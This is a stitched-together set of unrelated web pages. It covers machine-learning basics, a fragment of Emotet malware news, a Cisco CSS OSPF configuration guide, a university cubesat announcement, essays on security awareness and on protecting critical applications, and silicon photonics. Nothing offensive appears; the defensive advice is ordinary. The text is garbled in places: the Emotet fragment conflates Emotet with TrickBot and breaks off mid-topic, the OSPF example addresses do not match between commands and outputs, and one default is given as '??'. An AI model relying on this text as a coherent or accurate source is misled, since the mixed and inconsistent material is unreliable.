What are some basic terms you need to know?
ML systems are artificially intelligent, self-learning systems that use data mining, pattern recognition, and natural language processing to mimic human reasoning. They include a training phase in which the system learns from training data. For instance, an ML algorithm can learn to predict health or disease by analyzing all of the data generated by medical specialists.
Artificial intelligence is the study of how to make computers do things that people are better at, or would be better at, if they could extend what they do to a large amount of data and not make mistakes.
Supervised learning systems leverage training data of input values and associated output values also called labeled data. For example, a machine learning system can be trained using a set of images of cats and dogs, and when given a new image, the system can then predict whether it is a cat or a dog. Similarly, a supervised learning system can leverage logistic regression techniques and historical data to predict the value of a variable such as future market indices.
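The train-then-predict pattern described above can be sketched in a few lines of plain Python. This is an illustrative toy, not any of the systems the article describes: a one-feature logistic regression fitted by gradient descent on labeled data, then used to classify new inputs. The data values, learning rate, and epoch count are all assumptions chosen for the example.

```python
import math

def train_logistic(xs, ys, lr=0.5, epochs=2000):
    """Fit a one-feature logistic regression p = sigmoid(w*x + b)
    by plain stochastic gradient descent on labeled training data."""
    w, b = 0.0, 0.0
    for _ in range(epochs):
        for x, y in zip(xs, ys):
            p = 1.0 / (1.0 + math.exp(-(w * x + b)))  # predicted probability
            w -= lr * (p - y) * x                      # gradient step for weight
            b -= lr * (p - y)                          # gradient step for bias
    return w, b

def predict(w, b, x):
    """Label a new, unseen input using the trained parameters."""
    return 1 if 1.0 / (1.0 + math.exp(-(w * x + b))) >= 0.5 else 0

# Toy labeled data: small feature values belong to class 0, large to class 1
xs = [0.5, 1.0, 1.5, 3.5, 4.0, 4.5]
ys = [0, 0, 0, 1, 1, 1]
w, b = train_logistic(xs, ys)
print(predict(w, b, 0.8), predict(w, b, 4.2))  # prints: 0 1
```

On this toy data the learned boundary sits between the two groups, so new inputs on either side are classified accordingly; real systems apply the same idea to far richer feature sets.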
Unsupervised learning systems have an ability to learn and figure things out from unlabeled data. For example, an unsupervised machine learning system can learn how to group (also called clustering) a series of news articles under different categories without explicitly being told how to do it.
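The clustering idea can be illustrated with a bare-bones k-means in plain Python, again as a toy rather than a production approach: the algorithm groups unlabeled points without ever being told which group each belongs to. The data values and the deterministic initialization are assumptions made for the example.

```python
def kmeans(points, k, iters=20):
    """Bare-bones k-means: partition unlabeled points into k groups
    without ever being told which point belongs where."""
    centroids = points[:k]  # deterministic init for the example: first k points
    clusters = [[] for _ in range(k)]
    for _ in range(iters):
        clusters = [[] for _ in range(k)]
        for p in points:
            # assign each point to its nearest current centroid
            nearest = min(range(k), key=lambda i: (p - centroids[i]) ** 2)
            clusters[nearest].append(p)
        # move each centroid to the mean of its assigned points
        centroids = [sum(c) / len(c) if c else centroids[i]
                     for i, c in enumerate(clusters)]
    return centroids, clusters

points = [1.0, 1.2, 0.8, 8.0, 8.3, 7.9]
centroids, clusters = kmeans(points, k=2)
print(sorted(round(c, 2) for c in centroids))  # prints: [1.0, 8.07]
```

The two natural groupings in the data emerge from the algorithm itself, which is the essence of unsupervised learning: structure is discovered, not taught.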
Reinforcement learning systems have the ability to not only learn from training data but also improve their performance by processing external feedback. For example, the system that selects your favorite music list uses your feedback from previous choices and improves its selections on an ongoing basis.
Neural networks use supervised learning and were originally developed to emulate the human brain, which uses an extremely large network of neurons to process information. A simple neural network consists of a single layer of neurons that connects input data to output data.
Deep learning systems are neural networks with many layers, and the learning performed by them is called “deep learning.”
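The single-layer idea can be shown with a toy forward pass. The weights below are arbitrary example values, not a trained network; the point is only the structure: each neuron computes a weighted sum of the inputs and passes it through an activation, and stacking many such layers is what makes a network "deep."

```python
import math

def neuron(inputs, weights, bias):
    """One artificial neuron: a weighted sum of its inputs passed
    through a sigmoid activation, loosely mimicking a firing threshold."""
    total = sum(w * x for w, x in zip(weights, inputs)) + bias
    return 1.0 / (1.0 + math.exp(-total))

def layer(inputs, weight_rows, biases):
    """A single fully connected layer: one neuron per output value.
    Stacking many such layers is what makes a network 'deep'."""
    return [neuron(inputs, w, b) for w, b in zip(weight_rows, biases)]

# Arbitrary example weights (not a trained network)
out = layer([1.0, 0.0], [[2.0, -1.0], [-2.0, 1.0]], [0.0, 0.0])
print([round(o, 3) for o in out])  # prints: [0.881, 0.119]
```

In a real deep learning system, the output of one such layer becomes the input of the next, and training adjusts all of the weights at once.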
What are some successful applications of ML?
Now that you have some familiarity with ML and AI, let us look at a few examples of successful applications of these technologies:
• Customer profile analysis to understand and retain the most loyal customers, as well as target new customers
• Fraud and anomaly detection using clustering techniques
• Medical diagnosis, self-driving vehicles, and facial recognition using deep learning
• Recommender systems using reinforcement learning
What are some best practices for implementing ML systems?
• A successful implementation of an ML system requires a common understanding of the objectives between business and technology teams. There must be an agreed-upon set of metrics to evaluate and measure the performance of the system.
• Special attention should be paid if the machine learning systems are expected to provide an explanation of their decision-making process. Typically, machine learning systems are not very good at providing this detail. Experience suggests that in such cases, it is good to include a human expert during the overall process so that the ML system plays a support role in identifying the best possible options, but the human experts make the final decision.
• There must be proper guidelines for when ML systems should be retrained with new data. Depending on the domain, the training data used for building an ML system may not continue to be relevant after a period of time due to changes in other external factors. Therefore, it is important to have well-defined criteria for retraining the system with new data. This can be done as frequently as daily (e.g., setting price values) or after specific events (e.g., when new products or versions are introduced into the market). It is important to ensure appropriate support from the underlying IT and governance processes.
There are also potential organizational challenges worth watching:
• A common challenge that many enterprises face is lack of a cohesive leadership to drive ML and AI practices. Often, you find too many leaders racing against each other. It is important to have an AI strategy at an organization level that is aligned around enterprise data strategy, information security, governance, and compliance requirements.
• The next challenge is selecting the right use-case to implement. A few ideas to explore include looking for areas with high revenue but low efficiency, or business processes experiencing common errors. Additional factors to consider include availability of relevant data, business champions, and willingness to learn and adapt.
• The demand for AI talent will always be high compared to the availability of skilled resources within an organization. Consider bringing in outside talent by partnering with schools or universities, developing training classes and courses, and encouraging on-the-job training.
Today, there is a lot of buzz around ML and AI, and many C-level executives across many industries are very interested in building out a successful practice for these technologies. If you are just beginning your ML and AI journey, don’t fret, you’re not alone. Many of your colleagues are also just entering this burgeoning field. As you move forward with introducing ML and AI to your organization, consider starting small, identifying and building a few use-cases, and learning and growing your technologies from there. | <urn:uuid:bb00e0be-cce8-4778-a453-b746e77d9be1> | CC-MAIN-2022-40 | https://artificial-intelligence.cioreview.com/cxoinsight/best-practices-for-selecting-and-implementing-machine-learning-systems-nid-27236-cid-175.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337537.25/warc/CC-MAIN-20221005042446-20221005072446-00115.warc.gz | en | 0.944577 | 1,161 | 3.15625 | 3 |
The notorious Emotet malware has also changed its tactics, with an email campaign being spread via malicious Excel files, researchers found.

Researchers at Palo Alto Networks Unit 42 have identified a new high-volume Emotet infection campaign. The malware is known for altering and modifying its code to evade detection and continue its malicious activity, they wrote in a report published online Tuesday.

Emotet started out as a banking Trojan in 2014 and has evolved steadily into a full-fledged threat, sometimes existing as a botnet that had more than 1.5 million machines under its control, according to Check Point Software. The most common consequences of a TrickBot infection (a payload Emotet frequently delivers) are bank account fraud, high-value wire fraud and ransomware attacks.
Open Shortest Path First (OSPF) is a link state routing protocol in which each router maintains a local view of every area to which it has an attached interface. When an OSPF router comes up, it exchanges hello messages to discover its neighbors and (in the case of a Local Area Network (LAN)) elects Designated and Backup Designated Routers (DR and BDR). At this stage, it records its state in the neighbor structures. Then, it proceeds to build its local view of the area.
First, the router exchanges a database summary message with its immediate neighbors. These messages are used to determine which Link State Advertisements (LSAs) need to be requested from the neighbors. The replies to the Link State Requests (LSRs) are the Link State Updates (LSUs) that are sent until the neighbor acknowledges in a link state acknowledgment. The process of achieving synchronization among all routers in an area is known as routing convergence. In the case of a LAN, the database synchronization occurs between the routers and the DR and BDR separately. There is no router-to-router exchange other than with the DR or BDR, hence the number of messages is considerably reduced. OSPF supports the notion of hierarchical routing. For example, an Autonomous System (AS) is organized into areas containing no more than 50 routers, and a backbone area (area 0). Each area must contain at least one router with an interface in the backbone area. In addition, the backbone area must be connected. In other words, the routers in the backbone area must be connected either directly by links in the backbone area or by a "virtual link" that crosses a transit area.
OSPF is intended for use where customers are currently running OSPF as their routing protocol and need the Content Services Switch (CSS) 11000 content services switch to participate in the learning and advertising of OSPF routes.
The following are two examples of when customers would run OSPF on the CSS:
When the CSS is used in a transparent or proxy cache environment where it is placed in the middle of the network and needs to learn routes back to clients.
In a firewall load balancing implementation where the firewall routes need to be redistributed into the OSPF domain downstream from the CSS.
For more information on document conventions, see the Cisco Technical Tips Conventions.
There are no specific prerequisites for this document.
This document is not restricted to specific software and hardware versions.
The information presented in this document was created from devices in a specific lab environment. All of the devices used in this document started with a cleared (default) configuration. If you are working in a live network, ensure that you understand the potential impact of any command before using it.
The CSS 11000 implementation of OSPF supports the following:
The ability to route in a single area between other OSPF routers (intra-area route support).
The ability to route in multiple areas between OSPF routers (inter-area route support).
Hierarchical routing across multiple areas.
Route summarization between areas.
The AS boundary router support.
The stub-area support.
Routing Information Protocol (RIP) route leakage.
Redistribution of local, RIP, static, and firewall routes into the OSPF domain.
Management Information Base (MIB) per Request for Comments (RFC) 1850.
Perform the steps below to configure OSPF.
Configure an OSPF router ID. It is recommended that the IP address of the first OSPF interface be used.
Configure an OSPF area. OSPF backbone area 0.0.0.0 is created by default.
Configure OSPF on an IP interface. The interface is added into the backbone area by default.
Enable OSPF on that interface.
Configure the advertisement of Versatile Interface Processors (VIPs) if needed (issue the ospf advertise command). This will advertise that network/host out all OSPF interfaces.
Configure the route redistribution into the OSPF domain, if needed.
Configure the OSPF area summarization, if needed.
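Pulled together, the steps above might look like the following sequence on a CSS. The addresses, VLAN name, and VIP are illustrative values only (not prescribed ones), and the interface-level prompts assume a circuit that has already been configured with an IP address:

```
beta-rules(config)# ospf router-id 192.168.151.1
beta-rules(config)# ospf area 0.0.0.0
beta-rules(config-circuit-ip[VLAN2-192.168.151.1])# ospf area 0.0.0.0
beta-rules(config-circuit-ip[VLAN2-192.168.151.1])# ospf enable
beta-rules(config)# ospf as-boundary
beta-rules(config)# ospf advertise 192.168.200.1 /32
beta-rules(config)# ospf redistribute static
beta-rules(config)# ospf range 0.0.0.0 192.168.0.0 255.255.0.0
beta-rules(config)# ospf enable
```

Note that ospf as-boundary is placed before the advertise and redistribute commands, since the CSS must be an AS boundary router before VIPs or redistributed routes can be advertised into the OSPF domain.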
advertise - Advertises a route as OSPF AS external through all OSPF interfaces. The default type is type2. Primarily used to advertise a VIP or a range of VIPs into an OSPF domain. The command syntax is shown below.
beta-rules(config)# ospf advertise 220.127.116.11 /32 optional sub commands
Sub commands of the advertise command include the following:
metric - the metric to advertise.
tag - 32-bit tag to advertise.
type1 - Advertise as ASE type 1 (comparable cost to OSPF metric).
metric - Ranges from 1 to 15 and indicates the relative cost of this route. The larger the cost, the less preferable the route. The default is 1.
tag - A 32-bit field attached to each external route. This is not used by the OSPF protocol itself. It may be used to communicate information between AS boundary routers.
type1 - Expressed in the same units as OSPF interface cost (that is, in terms of the link state metric). Type 2 external metrics are an order of magnitude larger; any Type 2 metric is considered greater than the cost of any path internal to the AS. This configuration parameter can be used to have an OSPF domain prefer type1 VIPs over type2.
Note: The CSS must be configured as an Autonomous System Boundary (ASB) router before issuing the type1 command.
area - Configures an OSPF area. By default, area 0.0.0.0 is already configured. You can also specify an area as being a stub area, as shown below.
beta-rules(config)# ospf area 18.104.22.168 stub ?
default-metric - Metric for the default route advertised into the stub area.
send-summaries - Propagates summary LSAs into this stub area.
as-boundary - Configures the CSS as an ASB router.
An ASB is a router that exchanges routing information with routers belonging to other ASs, such as RIP domains. Issue this command to advertise VIPs, local, firewall, and RIP learned routes into an OSPF domain.
default - Advertises a default route as ASE through OSPF. Options include metric , tag , and type1 (type2 is default).
equal-cost - Number of equal cost routes OSPF can use. The range is 1 through 15.
enable - Enables OSPF globally.
range - Configures route summarization between OSPF areas.
beta-rules(config)# ospf range 0.0.0.0 10.10.0.0 255.255.0.0
The OSPF area 0.0.0.0 contains the contiguous networks that you would like to advertise to other areas. You also have the ability to block the advertisement of a range. An example is provided below.
beta-rules(config)# ospf range 0.0.0.0 10.10.0.0 255.255.0.0 block
redistribute - Advertises routes from other protocols through OSPF. Options include the following:
firewall - Advertises firewall routes through OSPF.
local - Advertises local routes through OSPF.
rip - Advertises RIP routes through OSPF.
static - Advertises static routes through OSPF. Sub options are metric , tag , and type1 .
router-id - Configures the OSPF router ID. It is recommended that you use the IP address of the first OSPF interface configured.
The command syntax is shown below.
beta-rules(config-circuit-ip[VLAN2-22.214.171.124])# ospf ?
The command options are shown below.
area - Configures the OSPF area to which this interface belongs. By default, an OSPF interface is already a member of the 0.0.0.0 area.
cost - Sets the cost of sending a packet on this interface. The default cost is 10.
dead - Sets the dead router interval (in seconds) for this interface. It is the number of seconds before the CSS's neighbors will declare it down, when they stop hearing the CSS's hello packets. The default is 40.
enable - Enables OSPF on this interface.
hello - Sets the hello interval (in seconds) for this interface. It is the length of time, in seconds, between the hello packets that the CSS sends on the interface. The default is ten.
password - Sets the simple password (a maximum of eight characters) for this interface. Simple password authentication guards against routers inadvertently joining the routing domain; each router must first be configured with its attached networks' passwords before it can participate in routing. The password is in clear text.
poll - Sets the poll interval (in seconds) for this interface. If a neighboring router has become inactive (hello packets have not been seen for RouterDeadInterval seconds), then it may still be necessary to send hello packets to the dead neighbor. These hello packets are sent at the reduced rate PollInterval, which should be much larger than HelloInterval. The default is ??.
priority - Sets the router priority. When two routers attached to a network both attempt to become the DR, the one with the highest router priority takes precedence. If there is still a tie, the router with the highest router ID takes precedence. A router whose router priority is set to 0 is ineligible to become DR on the attached network. The default is 1.
retransmit - Sets the retransmit interval (in seconds) for this interface. It is the number of seconds between LSA retransmissions, for adjacencies belonging to this interface. It is also used when retransmitting database description and link state request packets. This should be well over the expected round-trip delay between any two routers on the attached network. The setting of this value should be conservative, or needless retransmissions will result. The default is five.
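As an illustrative example of tuning these interface parameters (the values shown are examples, not recommendations), the following lowers the hello and dead intervals to speed up failure detection, and sets the priority to 0 so the CSS is never elected DR on the attached network. Remember that hello and dead intervals must match on all OSPF routers sharing the segment:

```
beta-rules(config-circuit-ip[VLAN2-192.168.151.1])# ospf hello 5
beta-rules(config-circuit-ip[VLAN2-192.168.151.1])# ospf dead 20
beta-rules(config-circuit-ip[VLAN2-192.168.151.1])# ospf priority 0
```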
The list below contains sample output from various show ospf commands.
show ospf advertise
beta-rules# show ospf advertise
OSPF Advertise Routes Entries:
Advertise Routes Prefix : 126.96.36.199
Advertise Routes Prefix Length : 32
Advertise Routes Metric : 1
Advertise Routes Type : aseType2
Advertise Routes Tag : 0
Note: In the above show command screen, a VIP with a 32-bit mask is advertised. Defaults are used for the other parameters.
show ospf areas
beta-rules# show ospf areas
Area ID Type SPF Runs Routers Routers LSAs Summaries
-------- ------- -------- --------- -------- ---- ---------
0.0.0.0 Transit 46 0 1 3 N/A
188.8.131.52 Stub 5 0 1 1 Yes
show ospf ase
beta-rules# show ospf ase
Link State ID Router ID Age T Tag Metric Address
--------------- --------------- ---- - -------- -------- ---------------
0.0.0.0 192.168.151.1 1 2 00000000 1 0.0.0.0
184.108.40.206 192.168.151.1 593 2 00000000 1 0.0.0.0
Note: Data traffic for the advertised destination will be forwarded to the forwarding address. If the forwarding address is set to 0.0.0.0, data traffic will be forwarded instead to the LSA's originator (that is, the responsible ASB router).
show ospf global
beta-rules# show ospf global
OSPF Global Summary:
Router ID: 192.168.151.1
Admin Status: enabled
Area Border Router: FALSE
AS Boundary Router: TRUE
External LSAs : 2
LSA Sent : 8
LSA Received : 5
show ospf interfaces
beta-rules# show ospf interfaces
OSPF Interface Summary:
IP Address: 192.168.151.1
Admin State: enabled
Area: 0.0.0.0 Type: broadcast
State: BDR Priority: 1
DR: 192.168.151.2 BDR: 192.168.151.1
Hello: 10 Dead: 40
Transmit Delay: 1 Retransmit: 5
show ospf lsdb
beta-rules# show ospf lsdb
OSPF LSDB Summary:
Area: 0.0.0.0 Type: Router
Link State ID: 192.168.151.1 ADV Router: 192.168.151.1
Area: 0.0.0.0 Type: Router
Link State ID: 192.168.151.2 ADV Router: 192.168.151.2
Area: 0.0.0.0 Type: Network
Link State ID: 192.168.151.2 ADV Router: 192.168.151.2
Area: Type: ASE
Link State ID: 0.0.0.0 ADV Router: 192.168.151.1
Area: Type: ASE
Link State ID: 220.127.116.11 ADV Router: 192.168.151.1
show ospf neighbors
beta-rules# show ospf neighbors
Address Neighbor ID Prio State Type Rxmt_Q
-------- ------------ ------ ------ ----- ------
192.168.151.2 192.168.151.2 1 Full Dynamic 0
show ospf range
beta-rules# show ospf range
Area ID LsdbType Addr Range Mask Range Effect
-------- ----------- ---------- -------------- ---------
18.104.22.168 summaryLink 22.214.171.124 255.0.0.0 advertise
show ospf redistribute
beta-rules# show ospf redistribute
Redistribution via OSPF Summary:
Static Routes Redistribution : disabled
RIP Routes Redistribution : disabled
Local Routes Redistribution : disabled
Firewall Routes Redistribution : disabled
show ip routes ospf
beta-rules# show ip routes ospf
prefix/length next hop if type proto age metric
------------------ --------------- ---- ------ -------- ---------- -----------
126.96.36.199/24 188.8.131.52 1021 remote ospf 5 1 | <urn:uuid:09acceec-bb21-4d93-8e45-593158dc28c2> | CC-MAIN-2022-40 | https://www.cisco.com/c/en/us/support/docs/application-networking-services/css-11000-series-content-services-switches/12638-OSPF.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337836.93/warc/CC-MAIN-20221006124156-20221006154156-00115.warc.gz | en | 0.824716 | 3,469 | 3.234375 | 3 |
A space-focused laboratory within Utah State University has developed a small satellite that would help NASA study cloud water and ice particles on microphysical levels.
USU Space Dynamics Laboratory’s cubesat would carry the HyperAngular Rainbow Polarimeter, an instrument that would introduce the ability to measure aerosol and cloud properties, USU said Thursday.
The University of Maryland, Baltimore County developed the HARP payload with the leadership of J. Vanderlei Martins, the project’s principal investigator.
NanoRacks will launch USU’s satellite with the HARP payload on a Northrop Grumman-made Cygnus cargo spacecraft next month. Cygnus will transport the HARP satellite and payload to the International Space Station.
"Working together with Dr. Martins and his team at UMBC as well as the NASA Earth Science Technology Office is a great example of academia, industry and government working together to answer scientific questions for the benefit of mankind," said Tim Neilsen, program manager for HARP at USU SDL.
People’s perceptions have changed. Not so long ago we thought nothing of kids playing outside all day alone, unchaperoned visits to a friend’s house, walking to school alone – the list goes on. But as times have changed, we have become much more vigilant about personal safety. The same can be said for the online world. The majority of us are well-aware of cybercrime and are generally on our guard for suspicious emails and websites. Yet despite this everyday vigilance, social engineers find ways to take advantage of our online behavior.
Cybercrime: We are already suspicious
When it comes to business IT security, company leaders generally want to establish a strong cybersecurity culture within their organizations. It’s a very natural thing to do. Human resources department training typically focuses on awareness and highlights typical mistakes that open the doors to a business’ systems and data. It shines a spotlight on what it means to be aware. But conducting security awareness training is not enough to reduce risk completely. Why? The truth is that most people are already “cyber aware.” We have all already formed an opinion on cybersecurity, and whom we trust.
Just think about it. How often do you hear a knock on the door these days, except from an unexpected visitor? A generation ago, a ringing doorbell was nearly cause for celebration. Everyone in the house leaped into action in near perfect unison. But people’s attitudes have changed. We are now not just suspicious, but actually distrustful, of people knocking on our door. We are conscious that not everyone who calls to the door nowadays is legit. It’s born out of the fact that we are aware of the many door-to-door scams or have been a victim of a cold caller ourselves. Besides, due to smartphones, we already know in advance if someone is dropping by – anyone else is considered an uninvited caller. In this way, the escalation of increasingly invasive marketing and social networking manipulation, coupled with technology that makes us easier to track and easier to target, has driven a culture-wide sense of security awareness.
The same can be said for cybersecurity. Nearly everyone is aware of the classic Nigerian 419 scam: in exchange for an up-front payment of a few thousand dollars, email recipients are promised several million in return. Word spread years ago that this, and many others like it, was a scam, and people now ignore such basic scams out of habit. Like the bogus salesmen calling to the door, we already have a heightened sense of awareness, causing us to be more cautious.
Cybersecurity training: Awareness alone doesn’t solve the problem
There is no question that awareness of cybersecurity is high now and has been for a couple of years – and that’s a good thing. The problem is that while cyber security training within an organization is well intentioned, it is solely invested in creating awareness. At this point, however, we are way past awareness. People are already suspicious of bogus email, SMS messages and calls.
The real focus should be on personal attack surface, e.g. the aforementioned data that makes us easier to track and to target. Attention needs to be given to the significance of personal information, the sharing of it and how to defend it. While we are “aware” cybercrime exists, many of us may not fully understand the implications of actions that open the door to cybercrime. This is partially why social engineering and other large-scale data breaches are often so successful – and you only need to look at the stats.
A 2017 Tenable survey found that nearly all participants were aware of security breaches. What the survey also revealed was that many admitted to not taking some degree of precaution to protect their personal data and have not changed their security habits in the face of a public threat. Not surprisingly, another study from Stanford University and security firm Tessian revealed that nine in ten (88%) data breach incidents are caused by employees’ mistakes – and costly ones at that. In 2020 alone, data breaches cost businesses an average of $3.86 million.
So, what, in light of this, are the best steps to start mitigating risk?
Reduce Employee Burden: Recognition of a person’s attackable surface
When it comes to reducing risk through employee training, businesses need to recognize that many people fall into one of two categories:
- There are those who are very concerned about personal data security. This cohort want to keep their data safe and do not want anyone “messing” with their personal information. They are already very much engaged with cybersecurity – they are not the problem.
- Then there are those who are the reverse. They are not interested in cyber security. They are aware but they don’t feel at risk, and as such are not willing to spend effort on it.
Trying to “convert” the second group of employees to become champions of cyber hygiene or cybersecurity can be, for a want of a better phrase, a waste of time. Until you can put cybersecurity into personal terms for each person, it is nearly impossible to change entrenched habits and opinions.
However, if you can pinpoint which extra-professional avenues of attack are most likely for an individual’s data profile, you may be able to make progress against this skepticism. It’s about recognition of a person’s attackable surface. Concern for one’s own personal safety will always trump concerns for company safety. Or, put in analog terms, you don’t have to convince suspicious people not to answer the phone; you need to convince them not to publish their phone number in the first place. The smarter everyone is about his or her personal data, the more secure the company will be.
Security awareness training is a common corporate exercise – but is no longer enough to reduce risk. By empowering your employees to safeguard their own digital footprints – along with company data – you can start to develop really formidable foes to cybercrime. | <urn:uuid:b8d0a75c-a304-43e1-9304-3f0b2f20d106> | CC-MAIN-2022-40 | https://getpicnic.com/2021/11/15/cybercrime-awareness-is-no-longer-enough-to-reduce-risk/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030338280.51/warc/CC-MAIN-20221007210452-20221008000452-00115.warc.gz | en | 0.967514 | 1,232 | 2.53125 | 3 |
Critical applications, categorically, have massive stores of data, are often globally utilized, have complex processing engines, and are entwined with other application services.
These applications are crucial to the everyday operations of organizations but due to their necessity, security teams need to take precautions to prevent attackers from exploiting their weaknesses.
The users of these applications rely so heavily on them working that their importance is most noticed when the apps fail.
Understanding the unique way each critical application operates and is set up for their respective organizations is crucial when identifying certain weaknesses making these apps and their data vulnerable. This knowledge will lead security teams to an awareness of potential risks and in turn, risk management tactics.
Financial Applications are often designed to deal with the specific requirements of financial institutions; these apps are pivotal for revenue and operational flow. But due to the sensitive and confidential nature of financial data, these apps are subjected to stringent regulations. Attackers may look for entry points in the systems connecting the financial organizations to online commerce systems used to process payments from customers.
Medical Applications are used to store, share, and exchange confidential data from a myriad of sources under the hospital umbrella: clinics, doctor’s offices, and specialized facilities. Much like financial applications, the data dealt with from these apps is extremely sensitive. In particular, the matter of a patient’s safety eclipses the importance of other regulations, potentially including security measures. Patient identification can get embedded into the network packet due to protocols ensuring that data is never mixed up or mistaken.
Messaging and communication applications are hubs for personal data, outside account and user verifications, private conversations, and potentially compromising information. An analysis of the California Attorney General breach notifications for 2017 showed that 5% of reported significant data breaches were directly attributed to credential exposure via email compromise. The potential for scams aimed at both customers and employees working internally is high when an email account becomes compromised.
Legacy Systems are specialized and customized applications that are used for things like reservation systems and customer management systems. These systems have higher potential of a security breach due to a lack of maintenance and support and, as one-off systems, they are often incompatible with more modern systems and tools. This means they are low performing, but their cost is high.
An important part of risk management is understanding where sources of potential vulnerabilities exist. Most critical application systems share the same vulnerabilities which all serve as possible entry points for attackers. As part of a forthcoming report on protecting applications, F5 commissioned a survey with Ponemon that found that 38% of respondents had “no confidence” in knowing where all their applications existed. Some common vulnerabilities are:
Credential Attacks can be a result of older applications lacking vigorous authentication systems. Authentication gateways are proxies used when a critical app’s system does not support better authentication. These proxies supply higher-level authentication: all access to the critical apps has passage through the gateway, invisibly passing the legacy credentials to the critical apps. Even weaker passwords can be fortified through contemporary technologies such as federation, single sign-on, and multi-factor. Network segregation is needed for these newer authentication technologies to be effective.
Segregation from Exploits and Denial-of-Service Attacks; reduce inbound network traffic to the limited protocols required for the app to be functional through segregation with firewalls and virtual LANs. Without the ability to patch some legacy/specialized applications, a firewall will restrict attempts to connect to vulnerable services. Services like Telnet, Finger, and CharGen that are easily exploited can be blocked from external access by reducing the attack surface. Virtual patching or firewalls with intrusion prevention can also be of help.
Encryption to prevent network interception; any threat that has already breached your network can target internal traffic carrying confidential information. If the critical application does not support transport-layer encryption, a TLS or VPN gateway can be employed. Working much like the authentication gateway, these wrap passing traffic in an encrypted tunnel, and should also be used for external links from the app, even to trusted third parties.
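On the gateway side, the essential configuration is a TLS context that refuses legacy protocol versions and requires certificate verification. A minimal sketch using Python's standard `ssl` module (a real deployment would also involve certificates, key management, and the tunnel itself):

```python
import ssl

def make_gateway_context():
    """TLS context for the gateway's encrypted leg of the connection.

    PROTOCOL_TLS_CLIENT enables hostname checking and certificate
    verification by default; we additionally refuse anything older
    than TLS 1.2.
    """
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    ctx.minimum_version = ssl.TLSVersion.TLSv1_2
    return ctx
```

The legacy app keeps speaking plaintext to the gateway over a segregated link, while everything that actually crosses the network is wrapped by this context.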
Computing historians may look back on 2016 as the Year of Silicon Photonics. Not because the technology has become ubiquitous – that may yet be years away – but because the long-awaited silicon photonics offerings are now commercially available in networking hardware. While the advancements in networking provided by silicon photonics are indisputable, the real game changer is in the CPU.
For over half a century, Moore’s Law has been the name of the game. The transistor density on chips has been remarkably cooperative in doubling on schedule since Gordon Moore first made his observation in 1965. But Moore’s Law is still subject to the constraints of physics. At some point, halving the size of the transistor will mean splitting atoms. It’s likely, of course, that economic constraints will kick in long before anyone introduces a nuclear fission CPU. Indeed, Intel has already shown that economic conditions can act as a brake on Moore’s Law.
This means that chip makers will have to get creative about how they drive performance improvements. Silicon photonics offers a tantalizing approach, as outlined in a paper by Ke Wen and colleagues presented at the Post-Moore's Era Supercomputing Workshop, colocated with the Supercomputing 2016 conference (SC16). Given the approaching limits of raw compute horsepower, Wen suggests shifting the focus to other areas for performance gains.
The ability to get data in and out of the CPU is just as important as the ability to pass data between hosts. Memory bandwidth is subject to its own physical limits. Intel’s Knights Landing chip requires 3647 pins per memory stack, and the pins can only be packed so densely. By using silicon photonics, a single waveguide can be used to provide the same bandwidth (100 gigabits per second) as an 8-channel High Bandwidth Memory cube.
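The trade-off above is easy to sanity-check with arithmetic. Taking the text's figures (100 Gb/s per waveguide, matching an 8-channel HBM cube), a hypothetical back-of-the-envelope helper might look like:

```python
import math

# Figures from the text; the derived numbers are just arithmetic.
WAVEGUIDE_GBPS = 100   # one silicon-photonic waveguide
HBM_CHANNELS = 8       # channels in the HBM cube it replaces

# Implied per-channel electrical bandwidth: 100 / 8 = 12.5 Gb/s.
per_channel_gbps = WAVEGUIDE_GBPS / HBM_CHANNELS

def waveguides_needed(target_gbps):
    """Waveguides required to reach a target aggregate bandwidth."""
    return math.ceil(target_gbps / WAVEGUIDE_GBPS)
```

So a hypothetical 400 Gb/s memory interface would need only four waveguides, versus thousands of pins on the electrical side.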
The low power requirements and the relatively unlimited transmission distance (compared to copper-based electronics) that silicon photonics provides could potentially lead to a new paradigm in hardware design. For a start, systems would no longer need non-uniform memory access (NUMA) to enable large memory configurations. This removes the need, for both the operating system and the programmer, to manage processor affinity in order to keep threads and their data logically nearby.
Fans of silicon photonics further suggest that the very nature of compute hardware may change. The current basic configuration of servers and blades is bound by the need to keep components close for maximum performance, as well as power and cooling. But if data can be passed at high bandwidth, high speed, and low power over great distances, why not reconsider how hardware is designed? If the components can be disaggregated, then systems can be built more modularly. This allows for greater flexibility and upgradeability.
Of course, we aren’t there yet. Silicon photonics only recently hit the networking space.
Vendors like Mellanox (March), Inphi (March), and Intel (June) have launched silicon photonics products this year. As we reported in August, Intel's silicon photonics offering was originally expected in early 2015. Indeed, Intel has been working toward this for years.
Getting to this point was not easy; as recently as 15 years ago, this was not considered a feasible solution. Researchers had to develop modulators that could operate in the 10 gigahertz range necessary for high-bandwidth communication. And there was another problem: silicon tends to produce heat, not light, when the electrons are excited. Intel researchers had to develop an electric waveguide field to build up photons in order to create a continuous laser beam. Several teams within Intel worked to make silicon-based lasers a usable reality.
Some hyperscale shops will undoubtedly leap on these offerings, and HPC environments that build out new clusters every year will consider silicon photonics. Intel touted Microsoft Azure as an early adopter of its silicon photonics networking products. The question is how quickly the rest of the industry will come along. Switching from copper to silicon photonics will require replacing networking gear in large swaths at once. Given that many datacenter managers are still content with gigabit or 10 gigabit at the top of the rack, it's hard to imagine a sudden, broad uptake. Indeed, it may prove that even though the networking side of silicon photonics has a head start in the market, the coming CPU advancements end up with a quicker adoption curve.
While you can be sure that chip makers are actively investigating this as a future product offering, there are no silicon photonics CPUs on the market yet. Intel, for example, is only publicly discussing silicon photonics for networking, not for CPUs. A team of researchers led by Vladimir Stojanović at UC Berkeley only produced a prototype late last year. The manufacturing process will need to get cheaper and, if we are to reach the goal of disaggregated systems, manufacturers of other components will need to buy into the idea as well. 2016 may be the first Year of Silicon Photonics, but it's likely not the last.
Machine learning isn't a new concept. It's been around since the 1940s and has been used in a variety of ways. But there has been a renewed emphasis placed on machine learning as more organizations realize the different ways it can be leveraged in data and analytics, both internally and externally.

Machine learning, the art of using algorithms and computers to do a task better as more data is fed to the algorithm, is a primary type of data science analysis and a subset of artificial intelligence. Machine learning seeks patterns in the data provided and enables a business to use those patterns to make quicker, better decisions.

